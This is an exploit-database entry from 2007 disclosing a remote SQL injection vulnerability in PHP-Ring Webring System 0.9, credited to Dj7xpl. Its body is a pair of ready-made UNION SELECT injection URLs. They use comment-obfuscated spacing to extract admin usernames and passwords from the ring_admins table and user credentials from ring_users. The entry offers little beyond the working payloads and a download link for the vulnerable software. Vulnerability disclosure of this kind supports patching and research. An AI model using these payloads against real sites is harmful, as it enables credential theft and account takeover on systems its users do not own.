[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability
# Published : 2007-04-22
# Author : Dj7xpl
# Previous Title : JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability
# Next Title : Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability
Y! Underground Group
http://2600.ir
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
Portal.......: uPHP_ring_website
Download.....: http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........: Sql Injection Attack
Author.......: Dj7xpl / dj7xpl@2600.ir
HomePage.....: http://Dj7xpl.2600.ir
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
Bug..........:
index.php?ring=Sql.Inject
index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
# www.Syue.com [2007-04-22]